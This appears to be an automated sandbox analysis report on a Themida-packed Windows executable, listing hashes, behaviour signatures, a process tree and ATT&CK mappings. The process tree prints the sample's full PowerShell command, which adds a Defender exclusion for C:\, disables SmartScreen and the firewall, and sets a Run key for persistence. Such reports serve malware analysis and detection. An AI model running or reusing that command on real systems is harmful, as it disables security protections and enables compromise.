Analysis

  • max time kernel
    117s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    15-02-2022 13:36

General

  • Target

    4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe

  • Size

    3.4MB

  • MD5

    240dc3df45fd2233148581beb6cdb4b1

  • SHA1

    6a565becd793e09d7a69ff2a116f821ddc2d79b1

  • SHA256

    4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a

  • SHA512

    0ff80f8192e3bda22f303b78eef624cd2b48fe0bc611c7acdfa48f4cd06b7bc1fcaa60710e8dcae6ccccd35bc0be3ac3e38d12c6e8e8e2d184b412d9a4e9bc52

Malware Config

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 1 IoCs
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe
    "C:\Users\Admin\AppData\Local\Temp\4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe"
    1⤵
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      2⤵
      • Modifies security service
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1960
      • C:\ProgramData\UpSys.exe
        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:852
        • C:\ProgramData\UpSys.exe
          "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1900
          • C:\ProgramData\UpSys.exe
            "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
            5⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:2020
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              6⤵
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1744
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        3⤵
          PID:1632
    • C:\Windows\system32\makecab.exe
      "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220215133654.log C:\Windows\Logs\CBS\CbsPersist_20220215133654.cab
      1⤵
      • Drops file in Windows directory
      PID:1600

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Modify Existing Service

    2
    T1031

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    3
    T1112

    Virtualization/Sandbox Evasion

    1
    T1497

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    2
    T1012

    Virtualization/Sandbox Evasion

    1
    T1497

    System Information Discovery

    3
    T1082

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • \ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • memory/1608-55-0x000000013FBD0000-0x000000014052B000-memory.dmp
      Filesize

      9.4MB

    • memory/1608-56-0x00000000776B0000-0x00000000776B2000-memory.dmp
      Filesize

      8KB

    • memory/1608-57-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp
      Filesize

      8KB

    • memory/1608-54-0x000000013FBD0000-0x000000014052B000-memory.dmp
      Filesize

      9.4MB

    • memory/1744-80-0x00000000024A2000-0x00000000024A4000-memory.dmp
      Filesize

      8KB

    • memory/1744-77-0x000007FEF2610000-0x000007FEF316D000-memory.dmp
      Filesize

      11.4MB

    • memory/1744-78-0x000007FEF4D3E000-0x000007FEF4D3F000-memory.dmp
      Filesize

      4KB

    • memory/1744-79-0x00000000024A0000-0x00000000024A2000-memory.dmp
      Filesize

      8KB

    • memory/1744-81-0x00000000024A4000-0x00000000024A7000-memory.dmp
      Filesize

      12KB

    • memory/1744-82-0x00000000024AB000-0x00000000024CA000-memory.dmp
      Filesize

      124KB

    • memory/1960-60-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp
      Filesize

      4KB

    • memory/1960-66-0x000000000269B000-0x00000000026BA000-memory.dmp
      Filesize

      124KB

    • memory/1960-64-0x000000001B720000-0x000000001BA1F000-memory.dmp
      Filesize

      3.0MB

    • memory/1960-65-0x0000000002694000-0x0000000002697000-memory.dmp
      Filesize

      12KB

    • memory/1960-63-0x0000000002692000-0x0000000002694000-memory.dmp
      Filesize

      8KB

    • memory/1960-61-0x0000000002690000-0x0000000002692000-memory.dmp
      Filesize

      8KB

    • memory/1960-62-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp
      Filesize

      4KB

    • memory/1960-59-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
      Filesize

      11.4MB